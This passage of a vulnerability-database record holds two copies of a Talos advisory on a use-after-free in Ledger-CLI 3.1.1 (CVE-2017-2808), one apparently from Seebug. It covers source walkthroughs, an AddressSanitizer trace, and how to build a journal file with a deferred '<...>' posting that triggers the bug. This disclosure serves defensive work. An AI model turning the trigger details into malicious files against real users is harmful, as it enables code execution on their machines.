Ledger-CLI 3.1.1. A specially crafted ledger file can cause a use-after-free vulnerability resulting in arbitrary code execution. An attacker can convince a user to load a journal file to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nLedger HEAD Ledger 3.1.1\r\n\r\n### Product URLs\r\nhttp://ledger-cli.org \r\nhttps://github.com/ledger/ledger.git\r\nhttps://github.com/ledger/ledger/tree/v3.1.1\r\n\r\n### CVSSv3 Score\r\n7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-416: Use After Free\r\n\r\n### Details\r\nLedger-cli is a plain-text, double-entry accounting system that is useable from the command line. It is based around a plain-text format known as a journal file that contains each transaction for each account.\r\nWhen parsing a malformed journal file, the application will misuse the std::unique_ptr type when exchanging objects between different parts of the parser. Due to this, when these pointers go out of scope they will be released and destroyed. However, due to the pointers still being retained by the application a use-after-free vulnerability will occur when the application attempts to process a user's commands.\r\nWhen first parsing a journal file, the application will execute the following code. This code will instantiate an instance_t, and then call its `.parse()` method [1]. The `.parse()` method will simply enter a loop that processes each line of the journal file using the `read_next_directive` method [2].\r\n```\r\nsrc/textual.cc:1987\r\nstd::size_t journal_t::read_textual(parse_context_stack_t& context_stack)\r\n{\r\n TRACE_START(parsing_total, 1, \"Total time spent parsing text:\");\r\n {\r\n instance_t instance(context_stack, context_stack.get_current(), NULL,\r\n checking_style == journal_t::CHECK_PERMISSIVE);\r\n instance.apply_stack.push_front\r\n (application_t(\"account\", context_stack.get_current().master));\r\n instance.parse(); // \\ [1]\r\n }\r\n TRACE_STOP(parsing_total, 1);\r\n\r\n // Apply any deferred postings at this time\r\n master->apply_deferred_posts();\r\n...\r\n}\r\n\\\r\nsrc/textual.cc:236\r\nvoid instance_t::parse(()\r\n{\r\n...\r\n while (in.good() && ! in.eof()) {\r\n try {\r\n read_next_directive(error_flag); // [2]\r\n }\r\n catch (const std::exception& err) {\r\n```\r\nThe `read_next_directive` method will iterate through each line of the journal file whilst looking at the first character to determine which command to process. If the first character is numeric, then the application will assume that it's an account directive and will call the `xact_directive` method to handle it [1].\r\n```\r\nsrc/textual.cc:334\r\nvoid instance_t::read_next_directive(bool& error_flag)\r\n\r\n char * line;\r\n std::streamsize len = read_line(line);\r\n if (len == 0 || line == NULL)\r\n return;\r\n\r\n if (! std::isspace(line[0]))\r\n error_flag = false;\r\n\r\n switch (line[0]) {\r\n...\r\n case '0':\r\n case '1':\r\n case '2':\r\n case '3':\r\n case '4':\r\n case '5':\r\n case '6':\r\n case '7':\r\n case '8':\r\n case '9':\r\n xact_directive(line, len); // [1]\r\n break;\r\n...\r\n```\r\nInside the `xact_directive` method, the application will call the `parse_xact` [1] method which will return a pointer. This pointer will then be assigned to a `unique_ptr<xact_t>` [2]. Due to it being incorrectly initialized from a pointer, there are no references to it. When the variable goes out of scope at [3], it will then be freed.\r\n```\r\nsrc/textual.cc:694\r\nvoid instance_t::xact_directive(char * line, std::streamsize len)\r\n\r\n TRACE_START(xacts, 1, \"Time spent handling transactions:\");\r\n\r\n if (xact_t * xact = parse_xact(line, len, top_account())) { // [1]\r\n unique_ptr<xact_t> manager(xact); // [2]\r\n\r\n if (context.journal->add_xact(xact)) {\r\n manager.release(); // it's owned by the journal now\r\n context.count++;\r\n }\r\n // It's perfectly valid for the journal to reject the xact, which it\r\n // will do if the xact has no substantive effect (for example, a\r\n // checking xact, all of whose postings have null amounts).\r\n } else { // [3]\r\n throw parse_error(_(\"Failed to parse transaction\"));\r\n\r\n\r\n TRACE_STOP(xacts, 1);\r\n ```\r\nThe `parse_xact method`, is responsible for allocating the `xact_t` object [1]. Near the end of this function, the application will call the `parse_post` method [2]. This method will allocate a post_t object, and then link the xact_t object to the `post_t`. Afterwards, the returned `post_t` will then be linked back to the `xact_t` object [3].\r\n```\r\nsrc/textual.cc:1776\r\nxact_t * instance_t::parse_xact(char * line,\r\n std::streamsize len,\r\n account_t * account)\r\n\r\n TRACE_START(xact_text, 1, \"Time spent parsing transaction text:\");\r\n\r\n unique_ptr<xact_t> xact(new xact_t); // [1]\r\n\r\n xact->pos = position_t();\r\n xact->pos->pathname = context.pathname;\r\n xact->pos->beg_pos = context.line_beg_pos;\r\n xact->pos->beg_line = context.linenum;\r\n xact->pos->sequence = context.sequence++;\r\n\r\n bool reveal_context = true;\r\n...\r\n if (post_t * post =\r\n parse_post(p, len - (p - line), account, xact.get())) { // [2]\r\n reveal_context = true;\r\n xact->add_post(post); // [3]\r\n last_post = post;\r\n }\r\n reveal_context = true;\r\n }\r\n }\r\n...\r\n return xact.release();\r\n```\r\n\r\nInside the `parse_post` method, the application will allocate a `post_t` via it's constructor [1], and then begin to parse any extra flags that were specified in the post. In order to reach the most vulnerable path which leads directly to code eecution, the `POST_DEFERRED` flag must be specified. This requires that there be an entry that begins and ends with the `< and >` characters [2].\r\n```\r\nsrc/textual.cc:1404\r\npost_t * instance_t::parse_post(char * line,\r\n std::streamsize len,\r\n account_t * account,\r\n xact_t * xact,\r\n bool defer_expr)\r\n\r\n TRACE_START(post_details, 1, \"Time spent parsing postings:\");\r\n\r\n unique_ptr<post_t> post(new post_t); // [1]\r\n\r\n post->xact = xact; // this could be NULL\r\n post->pos = position_t();\r\n post->pos->pathname = context.pathname;\r\n post->pos->beg_pos = context.line_beg_pos;\r\n post->pos->beg_line = context.linenum;\r\n post->pos->sequence = context.sequence++;\r\n...\r\n else if (*p == '<' && *(e - 1) == '>') {\r\n post->add_flags(POST_DEFERRED); // [2]\r\n DEBUG(\"textual.parse\", \"line \" << context.linenum << \": \"\r\n << \"Parsed a deferred account name\");\r\n p++; e--;\r\n }\r\n...\r\n return post.release();\r\n...\r\n```\r\n\r\nOnce the file is done parsing, the application will return back to the `journal_t::read_textual` method. At [1], the application will then proceed to apply any transactional information for the deferred posts in the `master` account that have been parsed by the `instance_t` parser.\r\n```\r\nsrc/textual.cc:1987\r\nstd::size_t journal_t::read_textual(parse_context_stack_t& context_stack)\r\n\r\n TRACE_START(parsing_total, 1, \"Total time spent parsing text:\");\r\n {\r\n instance_t instance(context_stack, context_stack.get_current(), NULL,\r\n checking_style == journal_t::CHECK_PERMISSIVE);\r\n instance.apply_stack.push_front\r\n (application_t(\"account\", context_stack.get_current().master));\r\n instance.parse();\r\n }\r\n TRACE_STOP(parsing_total, 1);\r\n\r\n // Apply any deferred postings at this time\r\n master->apply_deferred_posts(); // [1]\r\n```\r\nThis is done by the following code. At this point, the post object has already been freed due to it being out of scope due to lack of references. At [1], since the pointer was still assigned to the object, the application will iterate through all the deferred posts within the account. However, due to the object being released, the virtual method dereference at [2] will dereference memory that has gone out of scope.\r\n```\r\nsrc/account.cc:157\r\nvoid account_t::apply_deferred_posts()\r\n\r\n if (deferred_posts) {\r\n foreach (deferred_posts_map_t::value_type& pair, *deferred_posts) { // [1]\r\n foreach (post_t * post, pair.second)\r\n post->account->add_post(post); // [2]\r\n }\r\n deferred_posts = none;\r\n }\r\n\r\n // Also apply in child accounts\r\n foreach (const accounts_map::value_type& pair, accounts)\r\n pair.second->apply_deferred_posts();\r\n```\r\n\r\n### Crash Information\r\n```\r\n$ ledger -f poc.journal register\r\n\r\n=================================================================\r\n==20621==ERROR: AddressSanitizer: heap-use-after-free on address 0x6150000012d0 at pc 0x7f50d6b0767b bp \r\n0x7ffe5b6bca70 sp 0x7ffe5b6bca68\r\nREAD of size 8 at 0x6150000012d0 thread T0\r\n #0 0x7f50d6b0767a in ledger::account_t::apply_deferred_posts() /root/ledger/src/account.cc:162:15\r\n #1 0x7f50d6b07638 in ledger::account_t::apply_deferred_posts() /root/ledger/src/account.cc:169:18\r\n #2 0x7f50d6a776ce in ledger::journal_t::read_textual(ledger::parse_context_stack_t&) /root/ledger/src/textual.cc:2000:11\r\n #3 0x7f50d6af9d3f in ledger::journal_t::read(ledger::parse_context_stack_t&) /root/ledger/src/journal.cc:505:13\r\n #4 0x7f50d6a1056b in ledger::session_t::read_data(std::string const&) /root/ledger/src/session.cc:171:30\r\n #5 0x7f50d6a150bc in ledger::session_t::read_journal_files() /root/ledger/src/session.cc:203:5\r\n #6 0x567893 in ledger::global_scope_t::execute_command(std::list<std::string, std::allocator<std::string> >, bool) \r\n/root/ledger/src/global.cc:228:17\r\n #7 0x56c3e4 in ledger::global_scope_t::execute_command_wrapper(std::list<std::string, std::allocator<std::string> >, bool) \r\n/root/ledger/src/global.cc:273:5\r\n #8 0x53c996 in main /root/ledger/src/main.cc:121:30\r\n #9 0x7f50d3c297ec in __libc_start_main /build/eglibc-wIuxyX/eglibc-2.15/csu/libc-start.c:226\r\n #10 0x43fa20 in _start (/root/ledger/build/ledger+0x43fa20)\r\n\r\n0x6150000012d0 is located 208 bytes inside of 472-byte region [0x615000001200,0x6150000013d8)\r\nfreed by thread T0 here:\r\n #0 0x538410 in operator delete(void*) (/root/ledger/build/ledger+0x538410)\r\n #1 0x7f50d6b2137d in void boost::checked_delete<ledger::post_t>(ledger::post_t*) \r\n/usr/include/boost/checked_delete.hpp:34:5\r\n #2 0x7f50d6b2137d in ledger::xact_base_t::~xact_base_t() /root/ledger/src/xact.cc:62\r\n #3 0x7f50d6b413fd in ledger::xact_t::~xact_t() /root/ledger/src/xact.h:113:3\r\n #4 0x7f50d6b413fd in ledger::xact_t::~xact_t() /root/ledger/src/xact.h:111\r\n #5 0x7f50d6a8447b in std::default_delete<ledger::xact_t>::operator()(ledger::xact_t*) const /usr/bin/../lib/gcc/x86_64-linux-\r\ngnu/4.9/../../../../include/c++/4.9/bits/unique_ptr.h:76:2\r\n #6 0x7f50d6a8447b in std::unique_ptr<ledger::xact_t, std::default_delete<ledger::xact_t> >::~unique_ptr() \r\n/usr/bin/../lib/gcc/x86_64-linux-gnu/4.9/../../../../include/c++/4.9/bits/unique_ptr.h:236\r\n #7 0x7f50d6a8447b in ledger::(anonymous namespace)::instance_t::xact_directive(char*, long) \r\n/root/ledger/src/textual.cc:708\r\n #8 0x7f50d6a8447b in ledger::(anonymous namespace)::instance_t::read_next_directive(bool&) \r\n/root/ledger/src/textual.cc:375\r\n #9 0x7f50d6a79322 in ledger::(anonymous namespace)::instance_t::parse() /root/ledger/src/textual.cc:252:7\r\n #10 0x7f50d6a77594 in ledger::journal_t::read_textual(ledger::parse_context_stack_t&) /root/ledger/src/textual.cc:1995:14\r\n #11 0x7f50d6af9d3f in ledger::journal_t::read(ledger::parse_context_stack_t&) /root/ledger/src/journal.cc:505:13\r\n #12 0x7f50d6a1056b in ledger::session_t::read_data(std::string const&) /root/ledger/src/session.cc:171:30\r\n #13 0x7f50d6a150bc in ledger::session_t::read_journal_files() /root/ledger/src/session.cc:203:5\r\n #14 0x567893 in ledger::global_scope_t::execute_command(std::list<std::string, std::allocator<std::string> >, bool) \r\n/root/ledger/src/global.cc:228:17\r\n #15 0x56c3e4 in ledger::global_scope_t::execute_command_wrapper(std::list<std::string, std::allocator<std::string> >, bool) \r\n/root/ledger/src/global.cc:273:5\r\n #16 0x53c996 in main /root/ledger/src/main.cc:121:30\r\n #17 0x7f50d3c297ec in __libc_start_main /build/eglibc-wIuxyX/eglibc-2.15/csu/libc-start.c:226\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x5376d0 in operator new(unsigned long) (/root/ledger/build/ledger+0x5376d0)\r\n #1 0x7f50d6ab8e85 in ledger::(anonymous namespace)::instance_t::parse_post(char*, long, ledger::account_t*, \r\nledger::xact_t*, bool) /root/ledger/src/textual.cc:1412:27\r\n #2 0x7f50d6a82791 in ledger::(anonymous namespace)::instance_t::parse_xact(char*, long, ledger::account_t*) \r\n/root/ledger/src/textual.cc:1932:11\r\n #3 0x7f50d6a82791 in ledger::(anonymous namespace)::instance_t::xact_directive(char*, long) \r\n/root/ledger/src/textual.cc:698\r\n #4 0x7f50d6a82791 in ledger::(anonymous namespace)::instance_t::read_next_directive(bool&) \r\n/root/ledger/src/textual.cc:375\r\n #5 0x7f50d6a79322 in ledger::(anonymous namespace)::instance_t::parse() /root/ledger/src/textual.cc:252:7\r\n #6 0x7f50d6a77594 in ledger::journal_t::read_textual(ledger::parse_context_stack_t&) /root/ledger/src/textual.cc:1995:14\r\n #7 0x7f50d6af9d3f in ledger::journal_t::read(ledger::parse_context_stack_t&) /root/ledger/src/journal.cc:505:13\r\n #8 0x7f50d6a1056b in ledger::session_t::read_data(std::string const&) /root/ledger/src/session.cc:171:30\r\n #9 0x7f50d6a150bc in ledger::session_t::read_journal_files() /root/ledger/src/session.cc:203:5\r\n #10 0x567893 in ledger::global_scope_t::execute_command(std::list<std::string, std::allocator<std::string> >, bool) \r\n/root/ledger/src/global.cc:228:17\r\n #11 0x56c3e4 in ledger::global_scope_t::execute_command_wrapper(std::list<std::string, std::allocator<std::string> >, bool) \r\n/root/ledger/src/global.cc:273:5\r\n #12 0x53c996 in main /root/ledger/src/main.cc:121:30\r\n #13 0x7f50d3c297ec in __libc_start_main /build/eglibc-wIuxyX/eglibc-2.15/csu/libc-start.c:226\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free /root/ledger/src/account.cc:162:15 in \r\nledger::account_t::apply_deferred_posts()\r\nShadow bytes around the buggy address:\r\n 0x0c2a7fff8200: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c2a7fff8210: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c2a7fff8220: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa\r\n 0x0c2a7fff8230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c2a7fff8240: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n=>0x0c2a7fff8250: fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd\r\n 0x0c2a7fff8260: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c2a7fff8270: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa\r\n 0x0c2a7fff8280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c2a7fff8290: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c2a7fff82a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==20621==ABORTING\r\n```\r\n\r\n### Exploit Proof-of-Concept\r\nSimply run the ledger binary with the provided proof-of-concept as an argument followed by the command type. Both `xml` and `register` will trigger the vulnerability.\r\n```\r\n$ ledger -f poc.sample [xml|register]\r\n```\r\n\r\nThe proof-of-concept simply needs to have an account entry within it that includes a deferred posting. This means that a line must exist that begins with a number to specify an account directive. Then before the next account directive, there must be something within `'<' and '>'`symbols. This will enter the path that will dereference a function pointer.\r\n\r\n### Timeline\r\n* 2017-04-07 - Vendor Disclosure\r\n* 2017-08-30 - Public Release\r\n\r\n### CREDIT\r\n* Discovered by Cory Duplantis and another member of Cisco Talos.", "published": "2017-09-12T00:00:00", "type": "seebug", "title": "Ledger CLI Account Directive Use-After-Free Vulnerability(CVE-2017-2808)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2808"], "modified": "2017-09-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96444", "id": "SSV:96444", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "talos": [{"lastseen": "2020-07-01T21:25:30", "bulletinFamily": "info", "cvelist": ["CVE-2017-2808"], "description": "# Talos Vulnerability Report\n\n### TALOS-2017-0304\n\n## Ledger CLI Account Directive Use-After-Free Vulnerability\n\n##### August 30, 2017\n\n##### CVE Number\n\nCVE-2017-2808 \n\n### Summary\n\nAn exploitable use-after-free vulnerability exists in the account parsing component of the Ledger-CLI 3.1.1. A specially crafted ledger file can cause a use-after-free vulnerability resulting in arbitrary code execution. An attacker can convince a user to load a journal file to trigger this vulnerability.\n\n### Tested Versions\n\nLedger HEAD Ledger 3.1.1\n\n### Product URLs\n\n<http://ledger-cli.org> \n<https://github.com/ledger/ledger.git> \n<https://github.com/ledger/ledger/tree/v3.1.1>\n\n### CVSSv3 Score\n\n7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416: Use After Free\n\n### Details\n\nLedger-cli is a plain-text, double-entry accounting system that is useable from the command line. It is based around a plain-text format known as a journal file that contains each transaction for each account.\n\nWhen parsing a malformed journal file, the application will misuse the std::unique_ptr type when exchanging objects between different parts of the parser. Due to this, when these pointers go out of scope they will be released and destroyed. However, due to the pointers still being retained by the application a use-after-free vulnerability will occur when the application attempts to process a user\u2019s commands.\n\nWhen first parsing a journal file, the application will execute the following code. This code will instantiate an instance_t, and then call its `.parse()` method [1]. The `.parse()` method will simply enter a loop that processes each line of the journal file using the `read_next_directive` method [2].\n \n \n src/textual.cc:1987\n std::size_t journal_t::read_textual(parse_context_stack_t& context_stack)\n {\n TRACE_START(parsing_total, 1, \"Total time spent parsing text:\");\n {\n instance_t instance(context_stack, context_stack.get_current(), NULL,\n checking_style == journal_t::CHECK_PERMISSIVE);\n instance.apply_stack.push_front\n (application_t(\"account\", context_stack.get_current().master));\n instance.parse(); // \\ [1]\n }\n TRACE_STOP(parsing_total, 1);\n \n // Apply any deferred postings at this time\n master->apply_deferred_posts();\n ...\n }\n \\\n src/textual.cc:236\n void instance_t::parse(()\n {\n ...\n while (in.good() && ! in.eof()) {\n try {\n read_next_directive(error_flag); // [2]\n }\n catch (const std::exception& err) {\n \n\nThe `read_next_directive` method will iterate through each line of the journal file whilst looking at the first character to determine which command to process. If the first character is numeric, then the application will assume that it\u2019s an account directive and will call the `xact_directive` method to handle it [1].\n \n \n src/textual.cc:334\n void instance_t::read_next_directive(bool& error_flag)\n \n char * line;\n std::streamsize len = read_line(line);\n if (len == 0 || line == NULL)\n return;\n \n if (! std::isspace(line[0]))\n error_flag = false;\n \n switch (line[0]) {\n ...\n case '0':\n case '1':\n case '2':\n case '3':\n case '4':\n case '5':\n case '6':\n case '7':\n case '8':\n case '9':\n xact_directive(line, len); // [1]\n break;\n ...\n \n\nInside the `xact_directive` method, the application will call the `parse_xact` [1] method which will return a pointer. This pointer will then be assigned to a `unique_ptr<xact_t>` [2]. Due to it being incorrectly initialized from a pointer, there are no references to it. When the variable goes out of scope at [3], it will then be freed.\n \n \n src/textual.cc:694\n void instance_t::xact_directive(char * line, std::streamsize len)\n \n TRACE_START(xacts, 1, \"Time spent handling transactions:\");\n \n if (xact_t * xact = parse_xact(line, len, top_account())) { // [1]\n unique_ptr<xact_t> manager(xact); // [2]\n \n if (context.journal->add_xact(xact)) {\n manager.release(); // it's owned by the journal now\n context.count++;\n }\n // It's perfectly valid for the journal to reject the xact, which it\n // will do if the xact has no substantive effect (for example, a\n // checking xact, all of whose postings have null amounts).\n } else { // [3]\n throw parse_error(_(\"Failed to parse transaction\"));\n \n \n TRACE_STOP(xacts, 1);\n \n\nThe `parse_xact` method, is responsible for allocating the `xact_t` object [1]. Near the end of this function, the application will call the `parse_post` method [2]. This method will allocate a `post_t` object, and then link the `xact_t` object to the `post_t`. Afterwards, the returned `post_t` will then be linked back to the `xact_t` object [3].\n \n \n src/textual.cc:1776\n xact_t * instance_t::parse_xact(char * line,\n std::streamsize len,\n account_t * account)\n \n TRACE_START(xact_text, 1, \"Time spent parsing transaction text:\");\n \n unique_ptr<xact_t> xact(new xact_t); // [1]\n \n xact->pos = position_t();\n xact->pos->pathname = context.pathname;\n xact->pos->beg_pos = context.line_beg_pos;\n xact->pos->beg_line = context.linenum;\n xact->pos->sequence = context.sequence++;\n \n bool reveal_context = true;\n ...\n if (post_t * post =\n parse_post(p, len - (p - line), account, xact.get())) { // [2]\n reveal_context = true;\n xact->add_post(post); // [3]\n last_post = post;\n }\n reveal_context = true;\n }\n }\n ...\n return xact.release();\n \n\nInside the `parse_post` method, the application will allocate a `post_t` via it\u2019s constructor [1], and then begin to parse any extra flags that were specified in the post. In order to reach the most vulnerable path which leads directly to code eecution, the `POST_DEFERRED` flag must be specified. This requires that there be an entry that begins and ends with the `<` and `>` characters [2].\n \n \n src/textual.cc:1404\n post_t * instance_t::parse_post(char * line,\n std::streamsize len,\n account_t * account,\n xact_t * xact,\n bool defer_expr)\n \n TRACE_START(post_details, 1, \"Time spent parsing postings:\");\n \n unique_ptr<post_t> post(new post_t); // [1]\n \n post->xact = xact; // this could be NULL\n post->pos = position_t();\n post->pos->pathname = context.pathname;\n post->pos->beg_pos = context.line_beg_pos;\n post->pos->beg_line = context.linenum;\n post->pos->sequence = context.sequence++;\n ...\n else if (*p == '<' && *(e - 1) == '>') {\n post->add_flags(POST_DEFERRED); // [2]\n DEBUG(\"textual.parse\", \"line \" << context.linenum << \": \"\n << \"Parsed a deferred account name\");\n p++; e--;\n }\n ...\n return post.release();\n ...\n \n\nOnce the file is done parsing, the application will return back to the `journal_t::read_textual` method. At [1], the application will then proceed to apply any transactional information for the deferred posts in the `master` account that have been parsed by the `instance_t` parser.\n \n \n src/textual.cc:1987\n std::size_t journal_t::read_textual(parse_context_stack_t& context_stack)\n \n TRACE_START(parsing_total, 1, \"Total time spent parsing text:\");\n {\n instance_t instance(context_stack, context_stack.get_current(), NULL,\n checking_style == journal_t::CHECK_PERMISSIVE);\n instance.apply_stack.push_front\n (application_t(\"account\", context_stack.get_current().master));\n instance.parse();\n }\n TRACE_STOP(parsing_total, 1);\n \n // Apply any deferred postings at this time\n master->apply_deferred_posts(); // [1]\n \n\nThis is done by the following code. At this point, the post object has already been freed due to it being out of scope due to lack of references. At [1], since the pointer was still assigned to the object, the application will iterate through all the deferred posts within the account. However, due to the object being released, the virtual method dereference at [2] will dereference memory that has gone out of scope.\n \n \n src/account.cc:157\n void account_t::apply_deferred_posts()\n \n if (deferred_posts) {\n foreach (deferred_posts_map_t::value_type& pair, *deferred_posts) { // [1]\n foreach (post_t * post, pair.second)\n post->account->add_post(post); // [2]\n }\n deferred_posts = none;\n }\n \n // Also apply in child accounts\n foreach (const accounts_map::value_type& pair, accounts)\n pair.second->apply_deferred_posts();\n \n\n### Crash Information\n \n \n $ ledger -f poc.journal register\n \n =================================================================\n ==20621==ERROR: AddressSanitizer: heap-use-after-free on address 0x6150000012d0 at pc 0x7f50d6b0767b bp \n 0x7ffe5b6bca70 sp 0x7ffe5b6bca68\n READ of size 8 at 0x6150000012d0 thread T0\n #0 0x7f50d6b0767a in ledger::account_t::apply_deferred_posts() /root/ledger/src/account.cc:162:15\n #1 0x7f50d6b07638 in ledger::account_t::apply_deferred_posts() /root/ledger/src/account.cc:169:18\n #2 0x7f50d6a776ce in ledger::journal_t::read_textual(ledger::parse_context_stack_t&) /root/ledger/src/textual.cc:2000:11\n #3 0x7f50d6af9d3f in ledger::journal_t::read(ledger::parse_context_stack_t&) /root/ledger/src/journal.cc:505:13\n #4 0x7f50d6a1056b in ledger::session_t::read_data(std::string const&) /root/ledger/src/session.cc:171:30\n #5 0x7f50d6a150bc in ledger::session_t::read_journal_files() /root/ledger/src/session.cc:203:5\n #6 0x567893 in ledger::global_scope_t::execute_command(std::list<std::string, std::allocator<std::string> >, bool) \n /root/ledger/src/global.cc:228:17\n #7 0x56c3e4 in ledger::global_scope_t::execute_command_wrapper(std::list<std::string, std::allocator<std::string> >, bool) \n /root/ledger/src/global.cc:273:5\n #8 0x53c996 in main /root/ledger/src/main.cc:121:30\n #9 0x7f50d3c297ec in __libc_start_main /build/eglibc-wIuxyX/eglibc-2.15/csu/libc-start.c:226\n #10 0x43fa20 in _start (/root/ledger/build/ledger+0x43fa20)\n \n 0x6150000012d0 is located 208 bytes inside of 472-byte region [0x615000001200,0x6150000013d8)\n freed by thread T0 here:\n #0 0x538410 in operator delete(void*) (/root/ledger/build/ledger+0x538410)\n #1 0x7f50d6b2137d in void boost::checked_delete<ledger::post_t>(ledger::post_t*) \n /usr/include/boost/checked_delete.hpp:34:5\n #2 0x7f50d6b2137d in ledger::xact_base_t::~xact_base_t() /root/ledger/src/xact.cc:62\n #3 0x7f50d6b413fd in ledger::xact_t::~xact_t() /root/ledger/src/xact.h:113:3\n #4 0x7f50d6b413fd in ledger::xact_t::~xact_t() /root/ledger/src/xact.h:111\n #5 0x7f50d6a8447b in std::default_delete<ledger::xact_t>::operator()(ledger::xact_t*) const /usr/bin/../lib/gcc/x86_64-linux-\n gnu/4.9/../../../../include/c++/4.9/bits/unique_ptr.h:76:2\n #6 0x7f50d6a8447b in std::unique_ptr<ledger::xact_t, std::default_delete<ledger::xact_t> >::~unique_ptr() \n /usr/bin/../lib/gcc/x86_64-linux-gnu/4.9/../../../../include/c++/4.9/bits/unique_ptr.h:236\n #7 0x7f50d6a8447b in ledger::(anonymous namespace)::instance_t::xact_directive(char*, long) \n /root/ledger/src/textual.cc:708\n #8 0x7f50d6a8447b in ledger::(anonymous namespace)::instance_t::read_next_directive(bool&) \n /root/ledger/src/textual.cc:375\n #9 0x7f50d6a79322 in ledger::(anonymous namespace)::instance_t::parse() /root/ledger/src/textual.cc:252:7\n #10 0x7f50d6a77594 in ledger::journal_t::read_textual(ledger::parse_context_stack_t&) /root/ledger/src/textual.cc:1995:14\n #11 0x7f50d6af9d3f in ledger::journal_t::read(ledger::parse_context_stack_t&) /root/ledger/src/journal.cc:505:13\n #12 0x7f50d6a1056b in ledger::session_t::read_data(std::string const&) /root/ledger/src/session.cc:171:30\n #13 0x7f50d6a150bc in ledger::session_t::read_journal_files() /root/ledger/src/session.cc:203:5\n #14 0x567893 in ledger::global_scope_t::execute_command(std::list<std::string, std::allocator<std::string> >, bool) \n /root/ledger/src/global.cc:228:17\n #15 0x56c3e4 in ledger::global_scope_t::execute_command_wrapper(std::list<std::string, std::allocator<std::string> >, bool) \n /root/ledger/src/global.cc:273:5\n #16 0x53c996 in main /root/ledger/src/main.cc:121:30\n #17 0x7f50d3c297ec in __libc_start_main /build/eglibc-wIuxyX/eglibc-2.15/csu/libc-start.c:226\n \n previously allocated by thread T0 here:\n #0 0x5376d0 in operator new(unsigned long) (/root/ledger/build/ledger+0x5376d0)\n #1 0x7f50d6ab8e85 in ledger::(anonymous namespace)::instance_t::parse_post(char*, long, ledger::account_t*, \n ledger::xact_t*, bool) /root/ledger/src/textual.cc:1412:27\n #2 0x7f50d6a82791 in ledger::(anonymous namespace)::instance_t::parse_xact(char*, long, ledger::account_t*) \n /root/ledger/src/textual.cc:1932:11\n #3 0x7f50d6a82791 in ledger::(anonymous namespace)::instance_t::xact_directive(char*, long) \n /root/ledger/src/textual.cc:698\n #4 0x7f50d6a82791 in ledger::(anonymous namespace)::instance_t::read_next_directive(bool&) \n /root/ledger/src/textual.cc:375\n #5 0x7f50d6a79322 in ledger::(anonymous namespace)::instance_t::parse() /root/ledger/src/textual.cc:252:7\n #6 0x7f50d6a77594 in ledger::journal_t::read_textual(ledger::parse_context_stack_t&) /root/ledger/src/textual.cc:1995:14\n #7 0x7f50d6af9d3f in ledger::journal_t::read(ledger::parse_context_stack_t&) /root/ledger/src/journal.cc:505:13\n #8 0x7f50d6a1056b in ledger::session_t::read_data(std::string const&) /root/ledger/src/session.cc:171:30\n #9 0x7f50d6a150bc in ledger::session_t::read_journal_files() /root/ledger/src/session.cc:203:5\n #10 0x567893 in ledger::global_scope_t::execute_command(std::list<std::string, std::allocator<std::string> >, bool) \n /root/ledger/src/global.cc:228:17\n #11 0x56c3e4 in ledger::global_scope_t::execute_command_wrapper(std::list<std::string, std::allocator<std::string> >, bool) \n /root/ledger/src/global.cc:273:5\n #12 0x53c996 in main /root/ledger/src/main.cc:121:30\n #13 0x7f50d3c297ec in __libc_start_main /build/eglibc-wIuxyX/eglibc-2.15/csu/libc-start.c:226\n \n SUMMARY: AddressSanitizer: heap-use-after-free /root/ledger/src/account.cc:162:15 in \n ledger::account_t::apply_deferred_posts()\n Shadow bytes around the buggy address:\n 0x0c2a7fff8200: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c2a7fff8210: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c2a7fff8220: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa\n 0x0c2a7fff8230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c2a7fff8240: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n =>0x0c2a7fff8250: fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd\n 0x0c2a7fff8260: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c2a7fff8270: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa\n 0x0c2a7fff8280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c2a7fff8290: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c2a7fff82a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n Shadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n 